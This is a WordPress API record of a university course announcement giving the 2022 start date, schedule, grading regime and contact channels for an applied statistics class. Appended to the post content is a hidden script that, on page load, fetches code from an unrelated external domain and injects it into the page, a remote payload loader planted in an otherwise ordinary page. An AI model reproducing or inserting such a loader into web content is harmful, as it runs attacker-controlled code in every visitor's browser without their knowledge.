{"id":780,"date":"2022-03-09T19:27:26","date_gmt":"2022-03-09T22:27:26","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=780"},"modified":"2025-06-21T11:35:18","modified_gmt":"2025-06-21T14:35:18","slug":"inicio-clases-2022","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2022\/03\/09\/inicio-clases-2022\/","title":{"rendered":"Inicio Clases 2022 -MODALIDAD PRESENCIAL"},"content":{"rendered":"\n<p>El 8 de Marzo de 2022  en el Aula 2 de la FAUD.<\/p>\n\n\n\n<p>D\u00cdAS Y HORARIO DE CLASE:<br>Mi\u00e9rcoles 8.30hs a 10.30hs.<br><\/p>\n\n\n\n<p>DESPLIEGUE:<br>Semestral.<br><\/p>\n\n\n\n<p>R\u00c9GIMEN DE LA MATERIA:<br>Mixto: Promoci\u00f3n o Certificaci\u00f3n de Trabajos Pr\u00e1cticos.<br><\/p>\n\n\n\n<p>CANALES DE COMUNICACI\u00d3N DE LA C\u00c1TEDRA:<br>\u2713 MAIL DE LA C\u00c1TEDRA: estadaplicada.faud@gmail.com<br>\u2713 BLOG DE C\u00c1TEDRA: http:\/\/www.est-aplicada.faud.unsj.edu.ar\/<br>\u2713 AULA VIRTUAL: Aula 2050 (Estad\u00edstica Aplicada al Dise\u00f1o- DI y DG -FAUD).<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>El 8 de Marzo de 2022 en el Aula 2 de la FAUD. D\u00cdAS Y HORARIO DE CLASE:Mi\u00e9rcoles 8.30hs a 10.30hs. DESPLIEGUE:Semestral. R\u00c9GIMEN DE LA MATERIA:Mixto: Promoci\u00f3n o Certificaci\u00f3n de Trabajos Pr\u00e1cticos. CANALES DE COMUNICACI\u00d3N DE LA C\u00c1TEDRA:\u2713 MAIL DE LA C\u00c1TEDRA: estadaplicada.faud@gmail.com\u2713 BLOG DE C\u00c1TEDRA: http:\/\/www.est-aplicada.faud.unsj.edu.ar\/\u2713 AULA VIRTUAL: Aula 2050 (Estad\u00edstica Aplicada al Dise\u00f1o-<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2022\/03\/09\/inicio-clases-2022\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-780","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=780"}],"version-history":[{"count":3,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/780\/revisions"}],"predecessor-version":[{"id":812,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/780\/revisions\/812"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}